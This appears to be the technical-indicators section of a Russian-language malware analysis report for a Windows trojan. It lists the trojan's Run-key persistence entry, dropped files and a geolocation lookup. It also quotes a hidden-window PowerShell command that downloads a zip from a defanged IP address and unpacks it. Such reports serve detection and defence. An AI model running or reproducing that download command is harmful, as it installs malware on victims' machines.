Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'FxVqyJFJy' = '%LOCALAPPDATA%FxVqyJFJy\FxVqyJFJy.exe'
- http://10#.#10.151.169/arquivoloader/arquivoskl.zip как c:\xvjmbkcjgfe\kiepaosp.zip
- %WINDIR%\syswow64\explorer.exe
- %APPDATA%\orçamento 2020
- C:\xvjmbkcjgfe\kiepaosp.zip
- C:\xvjmbkcjgfe\launcher.exe
- C:\xvjmbkcjgfe\msctfmonitor.dll
- C:\xvjmbkcjgfe\staticcache.dat
- %LOCALAPPDATA%fxvqyjfjy\fxvqyjfjy.exe
- %LOCALAPPDATA%fxvqyjfjy\msctfmonitor.dll
- %LOCALAPPDATA%fxvqyjfjy\staticcache.dat
- http://10#.#10.151.169/arquivoloader/arquivosKL.zip
- http://ip##pi.com/json/
- DNS ASK ip##pi.com
- 'C:\xvjmbkcjgfe\launcher.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object Net.WebClient).DownloadFile('http://10#.#10.151.169/arquivoloader/arquivosKL.zip','C:\xvjmbkcjgfe\kiEPaOsP.zip');(new-object -com shell.application).namespace('C:\xvjmbkcjgfe').Copy...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe'
- '%WINDIR%\syswow64\explorer.exe'